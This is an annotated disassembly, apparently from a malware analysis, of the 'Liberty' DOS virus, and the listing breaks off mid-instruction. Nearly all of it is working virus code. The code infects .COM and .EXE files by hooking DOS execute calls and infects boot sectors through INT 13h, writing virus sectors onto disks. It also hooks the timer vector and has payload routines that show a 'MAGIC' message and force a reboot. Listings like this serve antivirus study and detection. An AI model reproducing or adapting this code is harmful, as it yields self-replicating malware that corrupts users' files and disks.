+CS:0312 0E PUSH CS +CS:0313 07 POP ES +CS:0314 B80902 MOV AX,0209 +CS:0317 BB420C MOV BX,0C42 +CS:031A B90100 MOV CX,0001 +CS:031D 9C PUSHF +CS:031E 2E CS: +CS:031F FF1E0C03 CALL FAR [030C] +CS:0323 72E5 JB 030A +CS:0325 B80905 MOV AX,0509 +CS:0328 BB4803 MOV BX,0348 +CS:032B B93100 MOV CX,0031 +CS:032E 9C PUSHF +CS:032F 2E CS: +CS:0330 FF1E0C03 CALL FAR [030C] +CS:0334 72D4 JB 030A +CS:0336 B80903 MOV AX,0309 +CS:0339 BB420C MOV BX,0C42 +CS:033C B93100 MOV CX,0031 +CS:033F 9C PUSHF +CS:0340 2E CS: +CS:0341 FF1E0C03 CALL FAR [030C] +CS:0345 07 POP ES +CS:0346 9D POPF +CS:0347 CF IRET +; +; Another format table used by the virus +; +DS:0340 00 00 31 02 00 00 32 02 +DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02 +DS:0360 00 00 37 02 00 00 38 02-00 00 39 02 +; +; The virus infects files by monitoring function 4Bh of vector 21h +; +CS:036C 9C PUSHF +CS:036D 3D004B CMP AX,4B00 ; Execute function ? +CS:0370 741E JZ 0390 +CS:0372 EB16 JMP 038A +CS:0374 90 NOP +CS:0375 E8B901 CALL 0531 ; Close file +CS:0378 E89A00 CALL 0415 ; Restore vectors +CS:037B C6060C04FF MOV BYTE PTR [040C],FF +CS:0380 90 NOP +CS:0381 9D POPF +CS:0382 07 POP ES +CS:0383 1F POP DS +CS:0384 5F POP DI +CS:0385 5E POP SI +CS:0386 5A POP DX +CS:0387 59 POP CX +CS:0388 5B POP BX +CS:0389 58 POP AX +CS:038A 9D POPF +CS:038B EA77142C02 JMP 022C:1477 ; Continue +CS:0390 50 PUSH AX +CS:0391 53 PUSH BX +CS:0392 51 PUSH CX +CS:0393 52 PUSH DX +CS:0394 56 PUSH SI +CS:0395 57 PUSH DI +CS:0396 1E PUSH DS +CS:0397 06 PUSH ES +CS:0398 9C PUSHF +CS:0399 E8A600 CALL 0442 ; Set error vectors +CS:039C E8E100 CALL 0480 ; Open file +CS:039F 72D4 JB 0375 +CS:03A1 0E PUSH CS +CS:03A2 1F POP DS +CS:03A3 0E PUSH CS +CS:03A4 07 POP ES +CS:03A5 A30A04 MOV [040A],AX +CS:03A8 93 XCHG BX,AX +CS:03A9 C6060C0401 MOV BYTE PTR [040C],01 +CS:03AE 90 NOP +CS:03AF E8D800 CALL 048A ; Read file header +CS:03B2 72C1 JB 0375 +CS:03B4 BB1301 MOV BX,0113 +CS:03B7 2E CS: +CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ? +CS:03BC 7505 JNZ 03C3 +CS:03BE E8C001 CALL 0581 ; Adapt header +CS:03C1 EBB2 JMP 0375 +CS:03C3 2E CS: +CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch +CS:03C9 E8CD00 CALL 0499 ; Check infection +CS:03CC 74A7 JZ 0375 +CS:03CE E8DD00 CALL 04AE ; Encrypt header +CS:03D1 E8EB00 CALL 04BF ; Move to EOF +CS:03D4 729F JB 0375 +CS:03D6 83FA00 CMP DX,+00 ; +CS:03D9 759A JNZ 0375 ; +CS:03DB 3D0005 CMP AX,0500 ; +CS:03DE 7295 JB 0375 ; +CS:03E0 3DFFEF CMP AX,EFFF ; +CS:03E3 7390 JNB 0375 ; Check file size +CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph +CS:03E8 728B JB 0375 +CS:03EA E80701 CALL 04F4 ; Write virus +CS:03ED 7286 JB 0375 +CS:03EF 3BC1 CMP AX,CX +CS:03F1 7C11 JL 0404 +CS:03F3 E81301 CALL 0509 ; Move to BOF +CS:03F6 7209 JB 0401 +CS:03F8 E86201 CALL 055D ; Decrypt Libery header +CS:03FB E81E01 CALL 051C ; Write Liberty header +CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header +CS:0401 E971FF JMP 0375 +CS:0404 E83801 CALL 053F ; Set & get vector 13h +CS:0407 E96BFF JMP 0375 +; +; Revectoring of error vectors. +; +CS:0415 1E PUSH DS +CS:0416 33DB XOR BX,BX +CS:0418 8EDB MOV DS,BX +CS:041A FA CLI +CS:041B 2E CS: +CS:041C 8B1E0D04 MOV BX,[040D] +CS:0420 891E8C00 MOV [008C],BX +CS:0424 2E CS: +CS:0425 8B1E0F04 MOV BX,[040F] +CS:0429 891E8E00 MOV [008E],BX +CS:042D FA CLI +CS:042E 2E CS: +CS:042F 8B1E1104 MOV BX,[0411] +CS:0433 891E9000 MOV [0090],BX +CS:0437 2E CS: +CS:0438 8B1E1304 MOV BX,[0413] +CS:043C 891E8E00 MOV [008E],BX +CS:0440 1F POP DS +CS:0441 C3 RET +CS:0442 1E PUSH DS +CS:0443 33DB XOR BX,BX +CS:0445 8EDB MOV DS,BX +CS:0447 8B1E8C00 MOV BX,[008C] +CS:044B 2E CS: +CS:044C 891E0D04 MOV [040D],BX +CS:0450 8B1E8E00 MOV BX,[008E] +CS:0454 2E CS: +CS:0455 891E0F04 MOV [040F],BX +CS:0459 FA CLI +CS:045A BB3106 MOV BX,0631 +CS:045D 891E8C00 MOV [008C],BX +CS:0461 8C0E8E00 MOV [008E],CS +CS:0465 8B1E9000 MOV BX,[0090] +CS:0469 2E CS: +CS:046A 891E1104 MOV [0411],BX +CS:046E 8B1E9200 MOV BX,[0092] +CS:0472 FA CLI +CS:0473 BB3206 MOV BX,0632 +CS:0476 891E9000 MOV [0090],BX +CS:047A 8C0E9200 MOV [0092],CS +CS:047E 1F POP DS +CS:047F C3 RET +; +; Various subroutines used by the virus +; +CS:0480 B8023D MOV AX,3D02 +CS:0483 9C PUSHF +CS:0484 2E CS: +CS:0485 FF1E8C03 CALL FAR [038C] +CS:0489 C3 RET +CS:048A B43F MOV AH,3F +CS:048C B97800 MOV CX,0078 +CS:048F BA1301 MOV DX,0113 +CS:0492 9C PUSHF +CS:0493 2E CS: +CS:0494 FF1E8C03 CALL FAR [038C] +CS:0498 C3 RET +CS:0499 BF1301 MOV DI,0113 +CS:049C 81C76802 ADD DI,0268 +CS:04A0 81EF0A02 SUB DI,020A +CS:04A4 BE6802 MOV SI,0268 +CS:04A7 FC CLD +CS:04A8 B90700 MOV CX,0007 +CS:04AB F3 REPZ +CS:04AC A6 CMPSB +CS:04AD C3 RET +CS:04AE B93C00 MOV CX,003C +CS:04B1 BE1301 MOV SI,0113 +CS:04B4 8B14 MOV DX,[SI] +CS:04B6 D3C2 ROL DX,CL +CS:04B8 8914 MOV [SI],DX +CS:04BA 46 INC SI +CS:04BB 46 INC SI +CS:04BC E2F6 LOOP 04B4 +CS:04BE C3 RET +CS:04BF B80242 MOV AX,4202 +CS:04C2 2E CS: +CS:04C3 8B1E0A04 MOV BX,[040A] +CS:04C7 33C9 XOR CX,CX +CS:04C9 33D2 XOR DX,DX +CS:04CB 9C PUSHF +CS:04CC 2E CS: +CS:04CD FF1E8C03 CALL FAR [038C] +CS:04D1 C3 RET +CS:04D2 B90400 MOV CX,0004 +CS:04D5 D3E8 SHR AX,CL +CS:04D7 BB6602 MOV BX,0266 +CS:04DA 8907 MOV [BX],AX +CS:04DC 40 INC AX +CS:04DD B90400 MOV CX,0004 +CS:04E0 D3E0 SHL AX,CL +CS:04E2 92 XCHG DX,AX +CS:04E3 33C9 XOR CX,CX +CS:04E5 B80042 MOV AX,4200 +CS:04E8 2E CS: +CS:04E9 8B1E0A04 MOV BX,[040A] +CS:04ED 9C PUSHF +CS:04EE 2E CS: +CS:04EF FF1E8C03 CALL FAR [038C] +CS:04F3 C3 RET +CS:04F4 B9330B MOV CX,0B33 +CS:04F7 B80040 MOV AX,4000 +CS:04FA BA1001 MOV DX,0110 +CS:04FD 2E CS: +CS:04FE 8B1E0A04 MOV BX,[040A] +CS:0502 9C PUSHF +CS:0503 2E CS: +CS:0504 FF1E8C03 CALL FAR [038C] +CS:0508 C3 RET +CS:0509 B80042 MOV AX,4200 +CS:050C 2E CS: +CS:050D 8B1E0A04 MOV BX,[040A] +CS:0511 33C9 XOR CX,CX +CS:0513 33D2 XOR DX,DX +CS:0515 9C PUSHF +CS:0516 2E CS: +CS:0517 FF1E8C03 CALL FAR [038C] +CS:051B C3 RET +CS:051C BA0A02 MOV DX,020A +CS:051F B80040 MOV AX,4000 +CS:0522 2E CS: +CS:0523 8B1E0A04 MOV BX,[040A] +CS:0527 B97800 MOV CX,0078 +CS:052A 9C PUSHF +CS:052B 2E CS: +CS:052C FF1E8C03 CALL FAR [038C] +CS:0530 C3 RET +CS:0531 B43E MOV AH,3E +CS:0533 2E CS: +CS:0534 8B1E0A04 MOV BX,[040A] +CS:0538 9C PUSHF +CS:0539 2E CS: +CS:053A FF1E8C03 CALL FAR [038C] +CS:053E C3 RET +CS:053F 33C0 XOR AX,AX +CS:0541 8ED8 MOV DS,AX +CS:0543 FA CLI +CS:0544 A14C00 MOV AX,[004C] +CS:0547 2E CS: +CS:0548 A31407 MOV [0714],AX +CS:054B A14E00 MOV AX,[004E] +CS:054E 2E CS: +CS:054F A31607 MOV [0716],AX +CS:0552 B8F906 MOV AX,06F9 +CS:0555 A34C00 MOV [004C],AX +CS:0558 8C0E4E00 MOV [004E],CS +CS:055C C3 RET +; +; Header encrypting +; +CS:055D B92D00 MOV CX,002D +CS:0560 BE0A02 MOV SI,020A +CS:0563 2E CS: +CS:0564 8B3C MOV DI,[SI] +CS:0566 D3CF ROR DI,CL +CS:0568 2E CS: +CS:0569 893C MOV [SI],DI +CS:056B 46 INC SI +CS:056C 46 INC SI +CS:056D E2F4 LOOP 0563 +CS:056F C3 RET +CS:0570 BE0A02 MOV SI,020A +CS:0573 B92D00 MOV CX,002D +CS:0576 8B3C MOV DI,[SI] +CS:0578 D3C7 ROL DI,CL +CS:057A 893C MOV [SI],DI +CS:057C 46 INC SI +CS:057D 46 INC SI +CS:057E E2F6 LOOP 0576 +CS:0580 C3 RET +; +; .EXE file handling +; +CS:0581 8B7F02 MOV DI,[BX+02] +CS:0584 83FFFF CMP DI,-01 ; Check infection +CS:0587 7439 JZ 05C2 +CS:0589 8B7F16 MOV DI,[BX+16] +CS:058C 83C710 ADD DI,+10 +CS:058F 893E2806 MOV [0628],DI +CS:0593 8B7F14 MOV DI,[BX+14] +CS:0596 893E2A06 MOV [062A],DI +CS:059A 8B7F0E MOV DI,[BX+0E] +CS:059D 83C710 ADD DI,+10 +CS:05A0 893E2C06 MOV [062C],DI +CS:05A4 8B7F10 MOV DI,[BX+10] +CS:05A7 893E2E06 MOV [062E],DI +CS:05AB BF1001 MOV DI,0110 +CS:05AE 897F14 MOV [BX+14],DI ; Set IP +CS:05B1 BF420D MOV DI,0D42 +CS:05B4 897F10 MOV [BX+10],DI ; Set SP +CS:05B7 2E CS: +CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch +CS:05BD E8FFFE CALL 04BF ; Move to EOF +CS:05C0 7301 JNB 05C3 +CS:05C2 C3 RET +CS:05C3 83FA0A CMP DX,+0A ; +CS:05C6 77FA JA 05C2 ; Check file size +CS:05C8 B104 MOV CL,04 +CS:05CA D3E8 SHR AX,CL +CS:05CC 40 INC AX +CS:05CD 3D0010 CMP AX,1000 +CS:05D0 7501 JNZ 05D3 +CS:05D2 42 INC DX +CS:05D3 D3E0 SHL AX,CL +CS:05D5 50 PUSH AX +CS:05D6 52 PUSH DX +CS:05D7 B91000 MOV CX,0010 +CS:05DA F7F1 DIV CX +CS:05DC BB1301 MOV BX,0113 +CS:05DF 2D1100 SUB AX,0011 +CS:05E2 8B7F08 MOV DI,[BX+08] +CS:05E5 2BC7 SUB AX,DI +CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment +CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment +CS:05ED 59 POP CX +CS:05EE 5A POP DX +CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph +CS:05F2 722F JB 0623 +CS:05F4 E8FDFE CALL 04F4 ; Write virus +CS:05F7 722A JB 0623 +CS:05F9 3BC1 CMP AX,CX +CS:05FB 7C27 JL 0624 +CS:05FD E8BFFE CALL 04BF ; Move to BOF +CS:0600 7221 JB 0623 +CS:0602 B90002 MOV CX,0200 +CS:0605 F7F1 DIV CX +CS:0607 83FA00 CMP DX,+00 +CS:060A 7401 JZ 060D +CS:060C 40 INC AX +CS:060D BB1301 MOV BX,0113 +CS:0610 894704 MOV [BX+04],AX ; Set blocks +CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark +CS:0618 E8EEFE CALL 0509 ; Move to BOF +CS:061B 7206 JB 0623 +CS:061D BA1301 MOV DX,0113 +CS:0620 E8FCFE CALL 051F ; Write header +CS:0623 C3 RET +CS:0624 E818FF CALL 053F ; Set & get vector 13h +CS:0627 C3 RET +; +; Error vectors +; +CS:0631 CF IRET ; Error vector 23h +CS:0632 32C0 XOR AL,AL ; +CS:0634 CF IRET ; Error vector 24h +; +; The next part is the virus's bootsector +; +CS:0635 EB01 JMP 0638 +CS:0637 90 NOP +CS:0638 33C0 XOR AX,AX +CS:063A 8ED0 MOV SS,AX +CS:063C BC007C MOV SP,7C00 +CS:063F 33C0 XOR AX,AX +CS:0641 8EC0 MOV ES,AX +CS:0643 BB1304 MOV BX,0413 ; +CS:0646 26 ES: ; +CS:0647 8B07 MOV AX,[BX] ; +CS:0649 2D0A00 SUB AX,000A ; +CS:064C B106 MOV CL,06 ; +CS:064E 26 ES: ; +CS:064F 8907 MOV [BX],AX ; Decrease memory +CS:0651 D3E0 SHL AX,CL +CS:0653 8EC0 MOV ES,AX +CS:0655 B80802 MOV AX,0208 ; +CS:0658 BB1001 MOV BX,0110 ; +CS:065B B93128 MOV CX,2831 ; +CS:065E 33D2 XOR DX,DX ; +CS:0660 CD13 INT 13 ; Read virus +CS:0662 06 PUSH ES +CS:0663 BB6806 MOV BX,0668 +CS:0666 53 PUSH BX +CS:0667 CB RETF +CS:0668 2E CS: +CS:0669 803EC8060A CMP BYTE PTR [06C8],0A +CS:066E 7446 JZ 06B6 +CS:0670 33C0 XOR AX,AX +CS:0672 8ED8 MOV DS,AX +CS:0674 2E CS: +CS:0675 FE06C806 INC BYTE PTR [06C8] +CS:0679 B80803 MOV AX,0308 +CS:067C BB1001 MOV BX,0110 +CS:067F B93128 MOV CX,2831 +CS:0682 33D2 XOR DX,DX +CS:0684 CD13 INT 13 +CS:0686 E85200 CALL 06DB ; Set & get vector 13h +CS:0689 2E CS: ; +CS:068A C606470BFF MOV BYTE PTR [0B47],FF ; +CS:068F 90 NOP ; +CS:0690 2E CS: ; +CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ; +CS:0696 90 NOP ; +CS:0697 2E CS: ; +CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off +CS:069D 90 NOP +CS:069E E82902 CALL 08CA ; Set & get vector 8h +CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch +CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h +CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h +CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h +CS:06AD E81900 CALL 06C9 ; Read original bootsector +CS:06B0 BB007C MOV BX,7C00 ; +CS:06B3 1E PUSH DS ; +CS:06B4 53 PUSH BX ; +CS:06B5 CB RETF ; Start +CS:06B6 E81000 CALL 06C9 ; Read bootsector +CS:06B9 B80103 MOV AX,0301 +CS:06BC BB007C MOV BX,7C00 +CS:06BF B90100 MOV CX,0001 +CS:06C2 33D2 XOR DX,DX +CS:06C4 CD13 INT 13 +CS:06C6 EBE5 JMP 06AD +CS:06C9 33C0 XOR AX,AX +CS:06CB 8EC0 MOV ES,AX +CS:06CD B80102 MOV AX,0201 +CS:06D0 BB007C MOV BX,7C00 +CS:06D3 B93F28 MOV CX,283F +CS:06D6 33D2 XOR DX,DX +CS:06D8 CD13 INT 13 +CS:06DA C3 RET +CS:06DB 33C0 XOR AX,AX +CS:06DD 8ED8 MOV DS,AX +CS:06DF A14C00 MOV AX,[004C] +CS:06E2 2E CS: +CS:06E3 A31608 MOV [0816],AX +CS:06E6 A14E00 MOV AX,[004E] +CS:06E9 2E CS: +CS:06EA A31808 MOV [0818],AX +CS:06ED FA CLI +CS:06EE B8FB07 MOV AX,07FB +CS:06F1 A34C00 MOV [004C],AX +CS:06F4 8C0E4E00 MOV [004E],CS +CS:06F8 C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:06F9 9C PUSHF +CS:06FA 80FC01 CMP AH,01 +CS:06FD 7E13 JLE 0712 +CS:06FF 80FC04 CMP AH,04 +CS:0702 7D0E JGE 0712 +CS:0704 80FA80 CMP DL,80 +CS:0707 720F JB 0718 +CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h +CS:070C 07 POP ES +CS:070D 1F POP DS +CS:070E 5A POP DX +CS:070F 59 POP CX +CS:0710 5B POP BX +CS:0711 58 POP AX +CS:0712 9D POPF +CS:0713 EA00000000 JMP 0000:0000 +CS:0718 50 PUSH AX +CS:0719 53 PUSH BX +CS:071A 51 PUSH CX +CS:071B 52 PUSH DX +CS:071C 1E PUSH DS +CS:071D 06 PUSH ES +CS:071E B80102 MOV AX,0201 ; +CS:0721 0E PUSH CS ; +CS:0722 07 POP ES ; +CS:0723 0E PUSH CS ; +CS:0724 1F POP DS ; +CS:0725 BB420C MOV BX,0C42 ; +CS:0728 B90100 MOV CX,0001 ; +CS:072B 32F6 XOR DH,DH ; +CS:072D 9C PUSHF ; +CS:072E 2E CS: ; +CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector +CS:0733 72D4 JB 0709 +CS:0735 0E PUSH CS +CS:0736 1F POP DS +CS:0737 0E PUSH CS +CS:0738 07 POP ES +CS:0739 BE420C MOV SI,0C42 ; +CS:073C BF3506 MOV DI,0635 ; +CS:073F B90A00 MOV CX,000A ; +CS:0742 FC CLD ; +CS:0743 F3 REPZ ; +CS:0744 A7 CMPSW ; Check infection +CS:0745 74C2 JZ 0709 +CS:0747 BE420C MOV SI,0C42 +CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ? +CS:074E 744A JZ 079A +CS:0750 B0FF MOV AL,FF +CS:0752 884402 MOV [SI+02],AL +CS:0755 B80905 MOV AX,0509 ; +CS:0758 BBA607 MOV BX,07A6 ; +CS:075B B93128 MOV CX,2831 ; +CS:075E 9C PUSHF ; +CS:075F 2E CS: ; +CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40 +CS:0764 72A3 JB 0709 +CS:0766 B80103 MOV AX,0301 ; +CS:0769 BB420C MOV BX,0C42 ; +CS:076C B93F28 MOV CX,283F ; +CS:076F 9C PUSHF ; +CS:0770 2E CS: ; +CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector +CS:0775 7292 JB 0709 +CS:0777 B80103 MOV AX,0301 ; +CS:077A BB3506 MOV BX,0635 ; +CS:077D B90100 MOV CX,0001 ; +CS:0780 9C PUSHF ; +CS:0781 2E CS: ; +CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector +CS:0786 7281 JB 0709 +CS:0788 B80803 MOV AX,0308 ; +CS:078B BB1001 MOV BX,0110 ; +CS:078E B93128 MOV CX,2831 ; +CS:0791 9C PUSHF ; +CS:0792 2E CS: ; +CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus +CS:0797 E96FFF JMP 0709 +CS:079A 2E CS: ; +CS:079B C606100300 MOV BYTE PTR [0310],00 ; +CS:07A0 E83B00 CALL 07DE ; Attach ??? +CS:07A3 E963FF JMP 0709 +; +; The format table is next +; +DS:07A0 28 00-31 02 28 00 32 02 28 00 +DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00 +DS:07C0 37 02 28 00 38 02 28 00-3F 02 +; +; Revectoring +; +CS:07CA 33C0 XOR AX,AX +CS:07CC 8ED8 MOV DS,AX +CS:07CE FA CLI +CS:07CF 2E CS: +CS:07D0 A11407 MOV AX,[0714] +CS:07D3 A34C00 MOV [004C],AX +CS:07D6 2E CS: +CS:07D7 A11607 MOV AX,[0716] +CS:07DA A34E00 MOV [004E],AX +CS:07DD C3 RET +CS:07DE 2E CS: +CS:07DF A11407 MOV AX,[0714] +CS:07E2 2E CS: +CS:07E3 A30C03 MOV [030C],AX +CS:07E6 2E CS: +CS:07E7 A11607 MOV AX,[0716] +CS:07EA 2E CS: +CS:07EB A30E03 MOV [030E],AX +CS:07EE B8F702 MOV AX,02F7 +CS:07F1 2E CS: +CS:07F2 A31407 MOV [0714],AX +CS:07F5 2E CS: +CS:07F6 8C0E1607 MOV [0716],CS +CS:07FA C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:07FB 9C PUSHF +CS:07FC 80FC03 CMP AH,03 +CS:07FF 7213 JB 0814 +CS:0801 80FC05 CMP AH,05 +CS:0804 730E JNB 0814 +CS:0806 80FA80 CMP DL,80 +CS:0809 720F JB 081A +CS:080B EB07 JMP 0814 +CS:080D 90 NOP +CS:080E 07 POP ES +CS:080F 1F POP DS +CS:0810 5A POP DX +CS:0811 59 POP CX +CS:0812 5B POP BX +CS:0813 58 POP AX +CS:0814 9D POPF +CS:0815 EA00000000 JMP 0000:0000 +CS:081A 50 PUSH AX +CS:081B 53 PUSH BX +CS:081C 51 PUSH CX +CS:081D 52 PUSH DX +CS:081E 1E PUSH DS +CS:081F 06 PUSH ES +CS:0820 2E CS: +CS:0821 803E0C0401 CMP BYTE PTR [040C],01 +CS:0826 74E6 JZ 080E +CS:0828 B80102 MOV AX,0201 ; +CS:082B 0E PUSH CS ; +CS:082C 07 POP ES ; +CS:082D 0E PUSH CS ; +CS:082E 1F POP DS ; +CS:082F BB420C MOV BX,0C42 ; +CS:0832 B90100 MOV CX,0001 ; +CS:0835 32F6 XOR DH,DH ; +CS:0837 9C PUSHF ; +CS:0838 2E CS: ; +CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector +CS:083D 72CF JB 080E +CS:083F 0E PUSH CS +CS:0840 1F POP DS +CS:0841 0E PUSH CS +CS:0842 07 POP ES +CS:0843 BE420C MOV SI,0C42 ; +CS:0846 BF3506 MOV DI,0635 ; +CS:0849 B90A00 MOV CX,000A ; +CS:084C FC CLD ; +CS:084D F3 REPZ ; +CS:084E A7 CMPSW ; Check infection +CS:084F 74BD JZ 080E +CS:0851 B0FF MOV AL,FF +CS:0853 884702 MOV [BX+02],AL +CS:0856 B80905 MOV AX,0509 ; +CS:0859 BBA607 MOV BX,07A6 ; +CS:085C B93128 MOV CX,2831 ; +CS:085F 9C PUSHF ; +CS:0860 2E CS: ; +CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28 +CS:0865 72A7 JB 080E +CS:0867 B80103 MOV AX,0301 ; +CS:086A BB420C MOV BX,0C42 ; +CS:086D B93F28 MOV CX,283F ; +CS:0870 9C PUSHF ; +CS:0871 2E CS: ; +CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector +CS:0876 7296 JB 080E +CS:0878 B80103 MOV AX,0301 ; +CS:087B BB3506 MOV BX,0635 ; +CS:087E B90100 MOV CX,0001 ; +CS:0881 9C PUSHF ; +CS:0882 2E CS: ; +CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0887 7285 JB 080E +CS:0889 B80803 MOV AX,0308 ; +CS:088C BB1001 MOV BX,0110 ; +CS:088F B93128 MOV CX,2831 ; +CS:0892 9C PUSHF ; +CS:0893 2E CS: ; +CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0898 E973FF JMP 080E +CS:089B 9C PUSHF +CS:089C 50 PUSH AX +CS:089D 1E PUSH DS +CS:089E 33C0 XOR AX,AX +CS:08A0 8ED8 MOV DS,AX +CS:08A2 833E860000 CMP WORD PTR [0086],+00 ; +CS:08A7 750F JNZ 08B8 ; Check if DOS is installed +CS:08A9 833E840000 CMP WORD PTR [0084],+00 ; +CS:08AE 7508 JNZ 08B8 +CS:08B0 1F POP DS +CS:08B1 58 POP AX +CS:08B2 9D POPF +CS:08B3 EA00000000 JMP 0000:0000 +CS:08B8 06 PUSH ES +CS:08B9 0E PUSH CS +CS:08BA 07 POP ES +CS:08BB E8C3F9 CALL 0281 ; Get vector 21h +CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h +CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h +CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag +CS:08C7 07 POP ES +CS:08C8 EBE6 JMP 08B0 +; +; Revectoring +; +CS:08CA A12000 MOV AX,[0020] +CS:08CD 2E CS: +CS:08CE A3B408 MOV [08B4],AX +CS:08D1 A12200 MOV AX,[0022] +CS:08D4 2E CS: +CS:08D5 A3B608 MOV [08B6],AX +CS:08D8 B89B08 MOV AX,089B +CS:08DB FA CLI +CS:08DC A32000 MOV [0020],AX +CS:08DF 8C0E2200 MOV [0022],CS +CS:08E3 C3 RET +CS:08E4 33C0 XOR AX,AX +CS:08E6 8ED8 MOV DS,AX +CS:08E8 FA CLI +CS:08E9 2E CS: +CS:08EA A1B408 MOV AX,[08B4] +CS:08ED A32000 MOV [0020],AX +CS:08F0 2E CS: +CS:08F1 A1B608 MOV AX,[08B6] +CS:08F4 A32200 MOV [0022],AX +CS:08F7 C3 RET +CS:08F8 A17000 MOV AX,[0070] +CS:08FB 2E CS: +CS:08FC A3900A MOV [0A90],AX +CS:08FF A17200 MOV AX,[0072] +CS:0902 2E CS: +CS:0903 A3920A MOV [0A92],AX +CS:0906 B8580A MOV AX,0A58 +CS:0909 FA CLI +CS:090A A37000 MOV [0070],AX +CS:090D 8C0E7200 MOV [0072],CS +CS:0911 C3 RET +; +; The next routine displays 'M A G I C ! !' on the screen for a second +; +CS:0912 50 PUSH AX +CS:0913 53 PUSH BX +CS:0914 51 PUSH CX +CS:0915 52 PUSH DX +CS:0916 56 PUSH SI +CS:0917 57 PUSH DI +CS:0918 1E PUSH DS +CS:0919 06 PUSH ES +CS:091A 9C PUSHF +CS:091B BB00B8 MOV BX,B800 ; +CS:091E 8EDB MOV DS,BX ; +CS:0920 0E PUSH CS ; +CS:0921 07 POP ES ; +CS:0922 33F6 XOR SI,SI ; +CS:0924 BF6809 MOV DI,0968 ; +CS:0927 B9A000 MOV CX,00A0 ; +CS:092A F3 REPZ ; +CS:092B A4 MOVSB ; Save screen +CS:092C BB00B8 MOV BX,B800 ; +CS:092F 8EC3 MOV ES,BX ; +CS:0931 0E PUSH CS ; +CS:0932 1F POP DS ; +CS:0933 33FF XOR DI,DI ; +CS:0935 BB080A MOV BX,0A08 ; +CS:0938 B95000 MOV CX,0050 ; +CS:093B B6CE MOV DH,CE ; +CS:093D 8A17 MOV DL,[BX] ; +CS:093F 80EA03 SUB DL,03 ; +CS:0942 26 ES: ; +CS:0943 8915 MOV [DI],DX ; +CS:0945 47 INC DI ; +CS:0946 47 INC DI ; +CS:0947 43 INC BX ; +CS:0948 E2F3 LOOP 093D ; Put text on screen +CS:094A E2FE LOOP 094A ; Wait +CS:094C BB00B8 MOV BX,B800 ; +CS:094F 8EC3 MOV ES,BX ; +CS:0951 0E PUSH CS ; +CS:0952 1F POP DS ; +CS:0953 33FF XOR DI,DI ; +CS:0955 BE6809 MOV SI,0968 ; +CS:0958 B9A000 MOV CX,00A0 ; +CS:095B F3 REPZ ; +CS:095C A4 MOVSB ; Restore screen +CS:095D 9D POPF +CS:095E 07 POP ES +CS:095F 1F POP DS +CS:0960 5F POP DI +CS:0961 5E POP SI +CS:0962 5A POP DX +CS:0963 59 POP CX +CS:0964 5B POP BX +CS:0965 58 POP AX +CS:0966 C3 RET +; +; A temporary screen buffer +; +DS:0960 4D 41 47 49 43 4D 41 47 +DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:09B0 47 49 43 4D 41 47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP 